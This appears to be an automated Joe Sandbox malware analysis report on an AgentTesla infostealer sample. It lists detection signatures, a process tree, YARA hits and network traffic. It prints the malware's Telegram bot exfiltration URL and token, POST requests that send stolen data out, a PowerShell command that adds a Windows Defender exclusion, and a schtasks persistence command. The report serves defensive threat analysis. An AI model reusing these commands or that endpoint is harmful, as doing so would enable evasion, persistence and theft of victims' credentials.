Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S.O.A18052022.exe

Overview

General Information

Sample Name:S.O.A18052022.exe
Analysis ID:626526
MD5:f2023f2bc7bb270d24f99c9d35d3ad18
SHA1:c5ac81e00b800d2a0a7f62c027602ac558b66a4e
SHA256:ce8a8dcf86d3395b6b9f349e4d2677ae515f1b067febb8f77b070043898ebe8a
Tags:exePayment
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Yara detected Generic Downloader
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • S.O.A18052022.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\S.O.A18052022.exe" MD5: F2023F2BC7BB270D24F99C9D35D3AD18)
    • powershell.exe (PID: 3660 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 2356 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DIPrtjjfjUpyJ" /XML "C:\Users\user\AppData\Local\Temp\tmp7211.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • S.O.A18052022.exe (PID: 6320 cmdline: C:\Users\user\Desktop\S.O.A18052022.exe MD5: F2023F2BC7BB270D24F99C9D35D3AD18)
  • cleanup
{"C2 url": "https://api.telegram.org/bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "2062013058", "Chat URL": "https://api.telegram.org/bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendDocument"}
SourceRuleDescriptionAuthorStrings
00000008.00000000.280288652.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000008.00000000.280288652.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000008.00000002.503223251.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.503223251.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.286263244.00000000040BF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 19 entries
            SourceRuleDescriptionAuthorStrings
            0.2.S.O.A18052022.exe.40fb108.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.S.O.A18052022.exe.40fb108.6.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.S.O.A18052022.exe.40fb108.6.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x30e37:$s10: logins
                • 0x3089e:$s11: credential
                • 0x2cdd3:$g1: get_Clipboard
                • 0x2cde1:$g2: get_Keyboard
                • 0x2cdee:$g3: get_Password
                • 0x2e0e6:$g4: get_CtrlKeyDown
                • 0x2e0f6:$g5: get_ShiftKeyDown
                • 0x2e107:$g6: get_AltKeyDown
                8.0.S.O.A18052022.exe.400000.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  8.0.S.O.A18052022.exe.400000.10.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 42 entries
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.S.O.A18052022.exe.40fb108.6.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "2062013058", "Chat URL": "https://api.telegram.org/bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendDocument"}
                    Source: S.O.A18052022.exe.6320.8.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendMessage"}
                    Source: S.O.A18052022.exeVirustotal: Detection: 50%Perma Link
                    Source: C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exeVirustotal: Detection: 50%Perma Link
                    Source: S.O.A18052022.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exeJoe Sandbox ML: detected
                    Source: 8.0.S.O.A18052022.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 8.0.S.O.A18052022.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: 8.0.S.O.A18052022.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 8.2.S.O.A18052022.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 8.0.S.O.A18052022.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 8.0.S.O.A18052022.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: S.O.A18052022.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49739 version: TLS 1.2
                    Source: S.O.A18052022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: EnumeratorDropIndi.pdb8n source: S.O.A18052022.exe, DIPrtjjfjUpyJ.exe.0.dr
                    Source: Binary string: EnumeratorDropIndi.pdb source: S.O.A18052022.exe, DIPrtjjfjUpyJ.exe.0.dr

                    Networking

                    barindex
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.S.O.A18052022.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.40fb108.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.42e8fe0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.40bf4e8.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.42601c0.9.raw.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: POST /bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3588fbc4d762Host: api.telegram.orgContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3589f2dd8009Host: api.telegram.orgContent-Length: 1895Expect: 100-continue
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: S.O.A18052022.exe, 00000008.00000002.506594458.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, S.O.A18052022.exe, 00000008.00000002.506710013.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: S.O.A18052022.exe, 00000008.00000002.504927842.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gQLZlB.com
                    Source: S.O.A18052022.exe, 00000000.00000002.284445306.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, S.O.A18052022.exe, 00000008.00000002.506527469.0000000002F6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                    Source: S.O.A18052022.exe, 00000008.00000002.506527469.0000000002F6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: S.O.A18052022.exe, 00000000.00000002.286263244.00000000040BF000.00000004.00000800.00020000.00000000.sdmp, S.O.A18052022.exe, 00000000.00000002.286689027.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, S.O.A18052022.exe, 00000008.00000000.280288652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, S.O.A18052022.exe, 00000008.00000000.278325947.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/
                    Source: S.O.A18052022.exe, 00000008.00000002.506527469.0000000002F6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendDocument
                    Source: S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendDocumentdocument-----
                    Source: S.O.A18052022.exe, 00000008.00000002.506527469.0000000002F6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                    Source: S.O.A18052022.exe, 00000008.00000002.506710013.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD8
                    Source: S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, S.O.A18052022.exe, 00000008.00000002.506594458.0000000002F7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cBg7jLh0ZH0on0CVQ4K.org
                    Source: S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownHTTP traffic detected: POST /bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3588fbc4d762Host: api.telegram.orgContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.telegram.org
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49739 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\S.O.A18052022.exe
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Source: 0.2.S.O.A18052022.exe.40fb108.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 8.0.S.O.A18052022.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 8.2.S.O.A18052022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 8.0.S.O.A18052022.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 8.0.S.O.A18052022.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.S.O.A18052022.exe.40fb108.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.S.O.A18052022.exe.42e8fe0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.S.O.A18052022.exe.40bf4e8.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.S.O.A18052022.exe.42e8fe0.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 8.0.S.O.A18052022.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 8.0.S.O.A18052022.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.S.O.A18052022.exe.42601c0.9.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.S.O.A18052022.exe.42601c0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 8.0.S.O.A18052022.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b5B658B79u002dD888u002d463Au002dA07Bu002dE9C66E337D0Cu007d/u003487A2F5Cu002dB34Du002d48F3u002d80C4u002d71B2B51EFA50.csLarge array initialization: .cctor: array initializer size 11687
                    Source: 8.0.S.O.A18052022.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b5B658B79u002dD888u002d463Au002dA07Bu002dE9C66E337D0Cu007d/u003487A2F5Cu002dB34Du002d48F3u002d80C4u002d71B2B51EFA50.csLarge array initialization: .cctor: array initializer size 11687
                    Source: 8.0.S.O.A18052022.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b5B658B79u002dD888u002d463Au002dA07Bu002dE9C66E337D0Cu007d/u003487A2F5Cu002dB34Du002d48F3u002d80C4u002d71B2B51EFA50.csLarge array initialization: .cctor: array initializer size 11687
                    Source: 8.2.S.O.A18052022.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b5B658B79u002dD888u002d463Au002dA07Bu002dE9C66E337D0Cu007d/u003487A2F5Cu002dB34Du002d48F3u002d80C4u002d71B2B51EFA50.csLarge array initialization: .cctor: array initializer size 11687
                    Source: S.O.A18052022.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: 0.2.S.O.A18052022.exe.40fb108.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 8.0.S.O.A18052022.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 8.2.S.O.A18052022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 8.0.S.O.A18052022.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 8.0.S.O.A18052022.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.S.O.A18052022.exe.40fb108.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.S.O.A18052022.exe.42e8fe0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.S.O.A18052022.exe.40bf4e8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.S.O.A18052022.exe.42e8fe0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 8.0.S.O.A18052022.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 8.0.S.O.A18052022.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.S.O.A18052022.exe.42601c0.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.S.O.A18052022.exe.42601c0.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_02F34358
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_02F34348
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_02F340B8
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_02F340A9
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_07959EF0
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_0795C600
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_079527D0
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_079527E0
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 0_2_07953669
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06288A28
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_0628D200
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06287800
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_0628B1F0
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_06283330
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_0628C560
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_063FF210
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_063FB6B0
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_063F06C8
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_063F3820
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_063F6590
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_063F73D0
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_063F9830
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_065A16C8
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_065A8400
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_065AA5B0
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_065A2090
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_065ABEEF
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_065ABFE0
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_065A40C8
                    Source: S.O.A18052022.exe, 00000000.00000002.286263244.00000000040BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenTHEIVVKVyvMTNPbllZwkDuvYF.exe4 vs S.O.A18052022.exe
                    Source: S.O.A18052022.exe, 00000000.00000002.284445306.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenTHEIVVKVyvMTNPbllZwkDuvYF.exe4 vs S.O.A18052022.exe
                    Source: S.O.A18052022.exe, 00000000.00000002.289765601.00000000078B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs S.O.A18052022.exe
                    Source: S.O.A18052022.exe, 00000000.00000002.286689027.00000000041DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs S.O.A18052022.exe
                    Source: S.O.A18052022.exe, 00000000.00000002.286689027.00000000041DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenTHEIVVKVyvMTNPbllZwkDuvYF.exe4 vs S.O.A18052022.exe
                    Source: S.O.A18052022.exe, 00000000.00000002.282536601.0000000000CD8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEnumeratorDropIndi.exe6 vs S.O.A18052022.exe
                    Source: S.O.A18052022.exe, 00000008.00000002.504312828.0000000000B38000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs S.O.A18052022.exe
                    Source: S.O.A18052022.exe, 00000008.00000000.280288652.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenTHEIVVKVyvMTNPbllZwkDuvYF.exe4 vs S.O.A18052022.exe
                    Source: S.O.A18052022.exe, 00000008.00000000.278683509.00000000007A8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEnumeratorDropIndi.exe6 vs S.O.A18052022.exe
                    Source: S.O.A18052022.exe, 00000008.00000002.504854217.0000000000E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs S.O.A18052022.exe
                    Source: S.O.A18052022.exeBinary or memory string: OriginalFilenameEnumeratorDropIndi.exe6 vs S.O.A18052022.exe
                    Source: S.O.A18052022.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: DIPrtjjfjUpyJ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: S.O.A18052022.exeVirustotal: Detection: 50%
